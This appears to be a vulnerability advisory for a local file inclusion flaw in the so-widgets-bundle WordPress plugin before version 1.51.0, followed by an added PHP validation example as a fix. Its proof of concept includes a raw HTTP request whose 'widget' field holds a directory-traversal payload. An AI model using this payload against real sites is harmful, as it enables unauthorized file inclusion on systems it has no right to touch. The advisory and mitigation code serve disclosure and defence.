wpvulndb | Sebastian Neef | WPVDB-ID: ADC9ED9F-55B4-43A9-A79D-C7120764F47C
History: Nov 27, 2023 - 12:00 a.m.

so-widgets-bundle < 1.51.0 - Admin+ Local File Inclusion

Published: 2023-11-27 00:00:00
Author: Sebastian Neef
Source: wpscan.com
Tags: wordpress, plugin, lfi, multisite

AI Score: 8.6 High (Confidence: High)
EPSS: 0.001 Low (Percentile: 19.5%)

Description

The plugin does not validate user input before using it to generate paths passed to include function(s), allowing users with the administrator role to perform LFI attacks in the context of Multisite WordPress sites.

PoC

1. Create a multi-site WordPress setup, e.g. using Docker containers, and set up a second "site" with a separate administrator (without super-admin/network-admin rights).
2. Install the so-widgets-bundle plugin and activate it for the network.
3. Log in as said new administrator to the separate site (here: "site2" at "/site2/").
4. Navigate to Plugins -> SiteOrigin Widgets.
5. Intercept the request when clicking on "Activate" or "Deactivate" of any widget. The request should look like this and provide the nonce:

    POST /site2/wp-admin/admin-ajax.php?action=so_widgets_bundle_manage&_wpnonce=f29efd46d6 HTTP/1.1
    Host: localhost
    Content-Length: 127
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Cookie: [cookie]
    Connection: close

    widget=../../../../../../../../../../../../../../../../../tmp/tmp&active=1
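The input validation the description says is missing, as an added example in PHP (not the plugin's own code and not its actual fix): a helper that accepts only a plain widget slug and confirms the resolved file stays inside the plugin's widget directory before anything reaches include. The names `resolve_widget_file`, `handle_manage_widget` and `$widgets_dir` are hypothetical.

```php
<?php
// Added example, not the plugin's code. Assumes one directory per widget under
// $widgets_dir, each containing <slug>/<slug>.php (a hypothetical layout).

/**
 * Return the absolute path of a widget's PHP entry point, or null if the
 * supplied identifier is not a plain slug or resolves outside $widgets_dir.
 */
function resolve_widget_file(string $widgets_dir, string $widget): ?string
{
    // 1. Syntactic allowlist: slugs only. This rejects "../", "/", "\" and NUL bytes,
    //    so a value like the PoC's "../../../tmp/tmp" never reaches the filesystem.
    if (!preg_match('/\A[a-z0-9][a-z0-9_-]{0,63}\z/', $widget)) {
        return null;
    }

    // 2. The slug must name an existing file; realpath() also collapses any
    //    remaining "." or ".." components and follows symlinks.
    $base      = realpath($widgets_dir);
    $candidate = realpath($widgets_dir . DIRECTORY_SEPARATOR . $widget
                        . DIRECTORY_SEPARATOR . $widget . '.php');
    if ($base === false || $candidate === false) {
        return null;
    }

    // 3. Containment check on the *resolved* path: guards against a symlink
    //    inside the widgets directory that points somewhere else.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }

    return $candidate;
}

// Hypothetical AJAX handler mirroring the request shape in the PoC
// (POST parameter "widget"); the include only happens after validation.
function handle_manage_widget(string $widgets_dir): void
{
    $widget = isset($_POST['widget']) ? (string) $_POST['widget'] : '';
    $file   = resolve_widget_file($widgets_dir, $widget);
    if ($file === null) {
        http_response_code(400);
        exit('Invalid widget identifier');
    }
    include_once $file;
}
```

A server-side log entry for every rejected identifier is a cheap detection signal: on a multisite install, traversal strings in this parameter from a site administrator's session are exactly the access pattern the advisory describes.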

CPE Name | Operator | Version
(not given) | eq | 1.51.0

